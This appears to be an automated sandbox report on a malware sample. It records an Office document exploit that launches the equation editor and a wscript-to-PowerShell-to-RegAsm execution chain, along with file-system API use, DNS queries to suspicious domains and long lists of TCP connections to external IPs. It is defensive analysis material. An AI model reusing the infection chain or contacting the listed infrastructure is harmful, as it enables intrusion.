                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000C.00000002.442834589.00000000002B9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,13_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,13_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,13_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407877 FindFirstFileW,FindNextFileW,13_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044E8F9 FindFirstFileExA,13_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,13_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,13_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,13_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,13_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_10006580 FindFirstFileExA,13_2_10006580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040AE51 FindFirstFileW,FindNextFileW,16_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,13_2_00407CD2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior

                  Software Vulnerabilities

                  barindex
                  Document exploit detected (process start blacklist hit)
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Suspicious execution chain found
                  Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  Source: global trafficDNS query: name: og1.in
                  Source: global trafficDNS query: name: og1.in
                  Source: global trafficDNS query: name: og1.in
                  Source: global trafficDNS query: name: og1.in
                  Source: global trafficDNS query: name: og1.in
                  Source: global trafficDNS query: name: og1.in
                  Source: global trafficDNS query: name: og1.in
                  Source: global trafficDNS query: name: raw.githubusercontent.com
                  Source: global trafficDNS query: name: maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro
                  Source: global trafficDNS query: name: geoplugin.net
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 178.237.33.50:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
